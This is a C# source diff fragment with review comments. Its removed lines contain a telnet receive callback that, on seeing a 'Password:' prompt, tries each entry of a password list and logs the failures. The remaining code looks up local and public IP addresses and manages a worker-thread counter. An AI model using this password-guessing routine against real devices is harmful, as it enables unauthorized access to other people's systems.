        // Failures are only logged; receiveDone is not signalled on this path.
        Console.WriteLine(e.ToString());
    }
}
/// <summary>
/// Per-receive state passed through the asynchronous socket callbacks:
/// the socket, the buffer each read fills, and the text collected so far.
/// </summary>
public class StateObject
{
    /// <summary>Size of the receive buffer, in bytes.</summary>
    public const int BufferSize = 256;

    /// <summary>Socket the receive runs on; null until the caller assigns it.</summary>
    public Socket workSocket = null;

    /// <summary>Buffer filled by each receive call.</summary>
    public byte[] buffer = new byte[BufferSize];

    /// <summary>Text accumulated from the chunks received so far.</summary>
    public StringBuilder sb = new StringBuilder();
}
- /// <summary>
- /// Separates the displayable text of a received buffer from the telnet option sequences
- /// embedded in it. Sequences that are found are appended to m_ListOptions; the remaining
- /// text is returned.
- /// </summary>
- /// <param name="m_strLineToProcess">Raw bytes received from the remote host (untrusted input).</param>
- /// <returns>The text left after option handling, or an empty string when an exception was caught.</returns>
- // NOTE(review): IAC, DO, DONT, WILL, WONT, SB, SE and m_ListOptions are declared outside
- // this view; presumably they are the telnet command bytes of the same names - confirm.
- private static string ProcessOptions(byte[] m_strLineToProcess)
- {
- string m_DISPLAYTEXT = "";
- string m_strTemp = "";
- string m_strOption = "";
- string m_strNormalText = "";
- bool bScanDone = false;
- int ndx = 0;
- int ldx = 0;
- char ch;
- try
- {
- // Widen every byte to a char so the buffer can be searched as a string.
- for (int i = 0; i < m_strLineToProcess.Length; i++)
- {
- Char ss = Convert.ToChar(m_strLineToProcess[i]);
- m_strTemp = m_strTemp + Convert.ToString(ss);
- }
- // Repeatedly locate the next IAC marker in what is left of the buffer.
- while (bScanDone != true)
- {
- int lensmk = m_strTemp.Length;
- ndx = m_strTemp.IndexOf(Convert.ToString(IAC));
- if (ndx > lensmk)
- ndx = m_strTemp.Length;
- if (ndx != -1)
- {
- // Text in front of the marker is display text; ch is the byte that follows IAC.
- m_DISPLAYTEXT += m_strTemp.Substring(0, ndx);
- ch = m_strTemp[ndx + 1];
- if (ch == DO || ch == DONT || ch == WILL || ch == WONT)
- {
- // Three-character negotiation: IAC, the verb, and the option code.
- m_strOption = m_strTemp.Substring(ndx, 3);
- string txt = m_strTemp.Substring(ndx + 3);
- // The text in front of the marker is appended here a second time.
- m_DISPLAYTEXT += m_strTemp.Substring(0, ndx);
- m_ListOptions.Add(m_strOption);
- m_strTemp = txt;
- }
- else
- if (ch == IAC)
- {
- // Doubled IAC: the display text is replaced (not appended) and one marker is skipped.
- m_DISPLAYTEXT = m_strTemp.Substring(0, ndx);
- m_strTemp = m_strTemp.Substring(ndx + 1);
- }
- else
- if (ch == SB)
- {
- // Subnegotiation: the option is taken as ldx characters starting at the marker,
- // where ldx is the position of the first SE in the buffer.
- m_DISPLAYTEXT = m_strTemp.Substring(0, ndx);
- ldx = m_strTemp.IndexOf(Convert.ToString(SE));
- m_strOption = m_strTemp.Substring(ndx, ldx);
- m_ListOptions.Add(m_strOption);
- m_strTemp = m_strTemp.Substring(ldx);
- }
- }
- else
- {
- // No marker left: the rest of the buffer is display text and the scan ends.
- m_DISPLAYTEXT = m_DISPLAYTEXT + m_strTemp;
- bScanDone = true;
- }
- }
- m_strNormalText = m_DISPLAYTEXT;
- }
- catch (Exception eP)
- {
- // Index and substring errors caused by the received bytes end up here; the
- // message is printed and the method returns the still-empty m_strNormalText.
- Console.WriteLine(eP.Message, "Application Error!!!");
- //Application.Exit();
- }
- return m_strNormalText;
- }
- /// <summary>
- /// Asynchronous receive callback for a telnet session. The received bytes are normalised,
- /// passed through ProcessOptions, and printed; when the resulting text contains
- /// "Password:", every entry of the passwords sequence (declared outside this method) is
- /// sent on the same socket and each reply is printed. A zero-byte read closes the socket.
- /// </summary>
- /// <param name="ar">Async result whose AsyncState is the session Socket.</param>
- // The bytes are read from m_byBuff, a buffer declared outside this method.
- // Defender's view: on the device this shows as a run of password attempts about 100 ms
- // apart on a single telnet session, which a failed-login limit or lockout interrupts;
- // every value tried and every reply is written to the console in clear text.
- public static void OnRecievedData(IAsyncResult ar)
- {
- // Get The connection socket from the callback
- Socket sock = (Socket)ar.AsyncState;
- sock.Blocking = false; // This is a non blocking IO
- // Get The data , if any
- int nBytesRec = sock.EndReceive(ar);
- if (nBytesRec > 0)
- {
- // sRecieved is decoded here but not read again below.
- string sRecieved = Encoding.ASCII.GetString(m_byBuff, 0, nBytesRec);
- string m_strLine = "";
- string myline = null;
- // Line-ending normalisation: CR becomes CR LF, a bare LF is dropped.
- for (int i = 0; i < nBytesRec; i++)
- {
- Char ch = Convert.ToChar(m_byBuff[i]);
- switch (ch)
- {
- case '\r':
- m_strLine += Convert.ToString("\r\n");
- break;
- case '\n':
- break;
- default:
- m_strLine += Convert.ToString(ch);
- break;
- }
- }
- try
- {
- int strLinelen = m_strLine.Length;
- if (strLinelen == 0)
- {
- m_strLine = Convert.ToString("\r\n");
- }
- // The array is sized from the length measured before the substitution above.
- Byte[] mToProcess = new Byte[strLinelen];
- for (int i = 0; i < strLinelen; i++)
- mToProcess[i] = Convert.ToByte(m_strLine[i]);
- // Process the incoming data
- string mOutText = ProcessOptions(mToProcess);
- //if (mOutText != "")
- // textBox1.AppendText(mOutText);
- myline+=mOutText;
- //Console.WriteLine("Received data: {0}", mOutText);
- // Respond to any incoming commands
- //RespondToOptions();
- }
- catch (Exception ex)
- {
- //Object x = this;
- Console.WriteLine(ex.Message, "Information!");
- }
- Console.WriteLine("Received data: {0}", myline);
- // A password prompt in the received text starts the loop over the password list.
- if (myline.Contains("Password:"))
- {
- foreach (string password in passwords)
- {
- Thread.Sleep(100);
- try
- {
- //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password + Convert.ToChar(13) + Convert.ToChar(10)));
- sock.Send(System.Text.Encoding.ASCII.GetBytes(password));
- //Thread.Sleep(100);
- byte[] data = new byte[1024];
- //string banner;
- int recv;
- recv = sock.Receive(data);
- string stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> Response telnet: " + stringdata);
- ///*
- //strRetPage = null;
- //bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
- //strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
- //while (bytes > 0)
- //{
- // bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
- // strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
- //}
- //Console.WriteLine("Response telnet: " + strRetPage);
- //*
- //Bad Password!!!
- // Substring match on the reply: an echoed "*", a repeated prompt, or "Bad Password".
- if (stringdata.Contains("*") || stringdata.Contains("Password:") || stringdata.Contains("Bad Password"))
- {
- Console.Write("{0} -> bad telnet password: {1}\n", password);
- }
- }
- catch (Exception e)
- {
- // Any failure for one entry is printed and the loop continues with the next entry.
- Console.WriteLine("{0} -> " + e.Message);
- }
- }
- }
- }
- else
- {
- // If no data was recieved then the connection is probably dead
- Console.WriteLine("Disconnected", sock.RemoteEndPoint);
- sock.Shutdown(SocketShutdown.Both);
- sock.Close();
- }
- }
/// <summary>
/// Returns the last IPv4 address the resolver reports for this machine's host name.
/// </summary>
/// <returns>The address in dotted form, or an empty string when no IPv4 address is listed.</returns>
public string LocalIPAddress()
{
    string lastIPv4 = "";
    IPAddress[] candidates = Dns.GetHostEntry(Dns.GetHostName()).AddressList;

    // Later entries overwrite earlier ones, so the last IPv4 entry is the one returned.
    for (int i = 0; i < candidates.Length; i++)
    {
        if (candidates[i].AddressFamily == AddressFamily.InterNetwork)
        {
            lastIPv4 = candidates[i].ToString();
        }
    }

    return lastIPv4;
}
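/// <summary>
/// Asks an external web service for this machine's public address and parses the
/// response body as an IP address.
/// </summary>
/// <returns>The address parsed from the response body.</returns>
/// <exception cref="FormatException">
/// The body is not an address literal. This includes the empty body that is left
/// when the download failed with a <see cref="WebException"/>, which is only logged.
/// </exception>
/// <remarks>
/// The request goes over plain HTTP and the body is parsed as-is, so the result is
/// only as trustworthy as the network path to the service.
/// </remarks>
public static IPAddress GetExternalIp()
{
    const string whatIsMyIp = "http://www.whatismyip.com/automation/n09230945.asp";
    string requestHtml = "";

    // WebClient is disposable; the using block releases it on every path.
    using (WebClient wc = new WebClient())
    {
        try
        {
            requestHtml = new UTF8Encoding().GetString(wc.DownloadData(whatIsMyIp));
        }
        catch (WebException we)
        {
            // Download failures are logged; parsing below then fails on the empty string.
            Console.Write(we.ToString());
        }
    }

    return IPAddress.Parse(requestHtml);
}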
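/// <summary>
/// Reads this machine's public address from the checkip.dyndns.org status page by
/// stripping the fixed HTML around the address and parsing what is left.
/// </summary>
/// <returns>The address parsed from the page.</returns>
/// <exception cref="FormatException">The page does not match the expected fixed markup.</exception>
/// <remarks>
/// The request goes over plain HTTP and the page is matched by exact string
/// replacement, so the result is only as trustworthy as the network path and any
/// change in the page layout makes parsing fail.
/// </remarks>
public static IPAddress GetExternalIp2()
{
    // The client, stream and reader are all disposable; the using blocks release
    // them even when the request or the read throws.
    using (WebClient client = new WebClient())
    {
        // Add a user agent header in case the requested URI contains a query.
        client.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)");
        string baseurl = "http://checkip.dyndns.org/";

        string s;
        using (Stream data = client.OpenRead(baseurl))
        using (StreamReader reader = new StreamReader(data))
        {
            s = reader.ReadToEnd();
        }

        s = s.Replace("<html><head><title>Current IP Check</title></head><body>Current IP Address: ", "")
             .Replace("</body></html>", "");
        return IPAddress.Parse(s);
    }
}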
/// <summary>
/// Handler with the signature of the counter's thread-launch event: takes this
/// instance's monitor and pulses it so that one thread waiting on it can continue.
/// </summary>
/// <param name="emetteur">Sender of the event; not used.</param>
private void Lancer_Thread(object emetteur)
{
    // Pulse must be called while holding the monitor it pulses.
    Monitor.Enter(this);
    try
    {
        Monitor.Pulse(this);
    }
    finally
    {
        Monitor.Exit(this);
    }
}
/// <summary>
/// Counter of running worker threads, guarded by the instance's own monitor.
/// Each public operation runs under <c>lock (this)</c>, waits once on the monitor
/// when the recorded state names one of the other two operations, does its work,
/// pulses the monitor and leaves the state at <see cref="Operation.Libre"/>.
/// </summary>
/// <remarks>
/// The state starts as <see cref="Operation.Incrementer"/>, so a call to
/// <see cref="Decrementer"/> or <see cref="Nb_thread"/> made before any
/// <see cref="Incrementer"/> call waits until the monitor is pulsed.
/// </remarks>
public class Compteur_thread
{
    /// <summary>Operation most recently recorded on the counter.</summary>
    public enum Operation
    {
        Incrementer = 1,
        Decrementer = 2,
        Nb_thread = 3,
        Libre = 4,
    }

    /// <summary>Signature of the handlers notified after each decrement.</summary>
    public delegate void Lancer_Thread(object emetteur);

    /// <summary>Raised inside <see cref="Decrementer"/>, while the monitor is held.</summary>
    public event Lancer_Thread lancer_thread;

    Operation operation = Operation.Incrementer;
    int compteur = 0;

    /// <summary>
    /// Waits once on the monitor when the recorded state is one of the two given
    /// operations. Must be called with the monitor held. Wait failures are logged
    /// and the caller carries on.
    /// </summary>
    private void AttendreSi(Operation premiere, Operation seconde)
    {
        if (operation != premiere && operation != seconde)
        {
            return;
        }

        try
        {
            Monitor.Wait(this);
        }
        catch (SynchronizationLockException e)
        {
            Console.WriteLine(e.ToString());
        }
        catch (ThreadInterruptedException e)
        {
            Console.WriteLine(e.ToString());
        }
    }

    /// <summary>Adds one to the counter.</summary>
    public void Incrementer()
    {
        lock (this)
        {
            AttendreSi(Operation.Decrementer, Operation.Nb_thread);
            operation = Operation.Incrementer;
            compteur++;
            Monitor.Pulse(this);
            operation = Operation.Libre;
        }
    }

    /// <summary>
    /// Subtracts one from the counter and notifies the <see cref="lancer_thread"/>
    /// subscribers, passing this instance as the sender.
    /// </summary>
    public void Decrementer()
    {
        lock (this)
        {
            AttendreSi(Operation.Incrementer, Operation.Nb_thread);
            operation = Operation.Decrementer;
            compteur--;
            if (lancer_thread != null)
            {
                lancer_thread(this);
            }

            Monitor.Pulse(this);
            operation = Operation.Libre;
        }
    }

    /// <summary>Reads the current counter value.</summary>
    /// <param name="nb">Receives the counter value.</param>
    public void Nb_thread(out int nb)
    {
        lock (this)
        {
            AttendreSi(Operation.Incrementer, Operation.Decrementer);
            operation = Operation.Nb_thread;
            nb = compteur;
            Monitor.Pulse(this);
            operation = Operation.Libre;
        }
    }
}
- }
- }